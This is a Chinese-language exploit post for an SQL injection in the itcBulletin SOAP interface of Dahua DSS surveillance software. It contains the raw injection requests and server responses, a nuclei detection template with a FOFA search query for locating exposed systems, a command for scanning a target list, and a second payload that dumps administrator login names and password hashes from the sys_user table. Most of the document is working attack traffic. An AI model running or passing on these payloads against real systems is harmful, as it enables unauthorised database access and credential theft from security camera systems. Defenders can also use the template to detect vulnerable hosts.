大华 DSS SQL 注入漏洞（附exp）

POST /portal/services/itcBulletin?wsdl HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Connection: closeContent-Length: 345Accept-Encoding: gzip
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>  <s11:Body>    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>      <netMarkings>        (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1      </netMarkings>    </ns1:deleteBulletin>  </s11:Body></s11:Envelope>

HTTP/1.1 500 Internal Server ErrorConnection: closeContent-Length: 581Content-Type: text/xml;charset=ISO-8859-1Date: Tue, 19 Dec 2023 10:13:48 GMTServer: Apache-Coyote/1.1
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server</faultcode><faultstring>PreparedStatementCallback; uncategorized SQLException for SQL [select t.* from C_BULLETIN t where t.NETMARKING in (        (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1      ) ]; SQL state [HY000]; error code [1105]; XPATH syntax error: '~6cfe798ba8e5b85feb50164c59f4bec'; nested exception is java.sql.SQLException: XPATH syntax error: '~6cfe798ba8e5b85feb50164c59f4bec'</faultstring></soap:Fault></soap:Body></soap:Envelope>

id: dahua-dss-itcBulletin-sqliinfo:  name: 大华DSS itcBulletin SQL注入漏洞  author: fgz  severity: high  description: 大华DSS数字监控系统itcBulletin接口存在SQL注入漏洞，攻击者可以利用该漏洞获取数据库敏感信息。  metadata:    fofa-query: app="dahua-DSS"
requests:  - raw:      - |+        POST /portal/services/itcBulletin?wsdl HTTP/1.1        Host: {{Hostname}}        Accept-Encoding: gzip        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15                <s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>          <s11:Body>            <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>              <netMarkings>                (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1              </netMarkings>            </ns1:deleteBulletin>          </s11:Body>        </s11:Envelope>
    matchers-condition: and    matchers:      - type: dsl        dsl:          - 'status_code==500 && contains(body,"error code [1105]") && contains(body,"6cfe798ba8e5b85feb50164c59f4bec")'

.nuclei.exe -t dahua-dss-itcBulletin-sqli.yaml  -l dahua-dss.txt

POST /portal/services/itcBulletin?wsdl HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Accept-Encoding: gzip <s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>  <s11:Body>    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>      <netMarkings>        (updatexml(1,concat(0x7e,(select substr(group_concat(login_name, " ",login_pass),1,30) from sys_user),0x7e),1))) and (1=1      </netMarkings>    </ns1:deleteBulletin>  </s11:Body></s11:Envelope>

HTTP/1.1 500 Internal Server ErrorConnection: closeContent-Length: 643Content-Type: text/xml;charset=ISO-8859-1Date: Tue, 19 Dec 2023 11:46:52 GMTServer: Apache-Coyote/1.1
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server</faultcode><faultstring>PreparedStatementCallback; uncategorized SQLException for SQL [select t.* from C_BULLETIN t where t.NETMARKING in (        (updatexml(1,concat(0x7e,(select substr(group_concat(login_name, " ",login_pass),1,30) from sys_user),0x7e),1))) and (1=1) ]; SQL state [HY000]; error code [1105]; XPATH syntax error: '~system 8e173a7bb9ec8156d772cf4~'; nested exception is java.sql.SQLException: XPATH syntax error: '~system 8e173a7bb9ec8156d772cf4~'</faultstring></soap:Fault></soap:Body></soap:Envelope>